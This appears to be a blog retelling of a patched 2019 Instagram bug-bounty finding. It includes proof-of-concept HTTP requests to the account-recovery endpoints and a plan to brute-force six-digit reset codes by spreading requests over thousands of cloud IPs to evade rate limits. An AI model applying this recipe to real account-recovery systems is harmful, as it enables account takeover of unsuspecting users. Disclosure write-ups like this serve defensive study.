How I Could Have Hacked Any Instagram Account? | Earn $30,000

This article is about how I found a problem to hacked any Instagram that let me get into any Instagram account without permission. Facebook and Instagram fixed the problem and gave me $30,000 as a reward.

Facebook is always trying to make its apps safer. They recently started giving more money to people who find big problems, like taking over accounts. So, I decided to see if I could find one on Instagram.

First, I tried to reset my password on the Instagram website, but I couldn’t find any bugs. Then, I tried on my phone and found a way to trick it. When you type in your phone number, Instagram sends you a code to reset your password. If you can try lots of codes really quickly, you can get into any account. But I thought there would be limits to how many times you could try. I tested it and found that there were limits, but I also found a way around them.

I found out that if I use many different computers and change my internet address often, I could try lots of times without getting stopped. I told Facebook about the problem, but at first, they couldn’t figure out how to do it. I had to explain it to them more and show them how it worked.

Proof of Concept:

Request:

POST /api/v1/users/lookup/ HTTP/1.1
User-Agent: Instagram 92.0.0.11.114 Android (27/8.1.0; 440dpi; 1080×2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654)
Accept-Language: en-IN, en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Host: i.instagram.com
Connection: keep-alive

q=mobile_number&device_id=android-device-id-here

The victim will receive a passcode and it will expire in 10 minutes.

Verify Passcode:

POST /api/v1/accounts/account_recovery_code_verify/ HTTP/1.1
User-Agent: Instagram 92.0.0.11.114 Android (27/8.1.0; 440dpi; 1080×2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654)
Accept-Language: en-IN, en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Host: i.instagram.com
Connection: keep-alive

recover_code=123456&device_id=android-device-id-here

Now we need to brute-force this endpoint using multiple IPs. Roughly, I was able to send 200 requests from a single IP without hitting rate limit. I have used 1000 different machines (to achieve concurrency easily) and IPs to send 200k requests (that’s 20 percent of total one million probability) in my tests.

In a real attack scenario, the attacker needs 5000 IPs to hack an account. It sounds big but that’s actually easy if you use a cloud service provider like Amazon or Google. It would cost around 150 dollars to perform the complete attack of one million codes.

The Facebook security team was convinced after providing the above video of sending 200k valid requests. They were also quick in addressing and fixing the issue.

After the Patch

Well at the end specially thanks to Laxman Muthiyah for this article. You can read more about it. READ

Fix

This Bug has been found in July 2019 and Now the Facebook security team fixed this bug.

error: Content is protected !!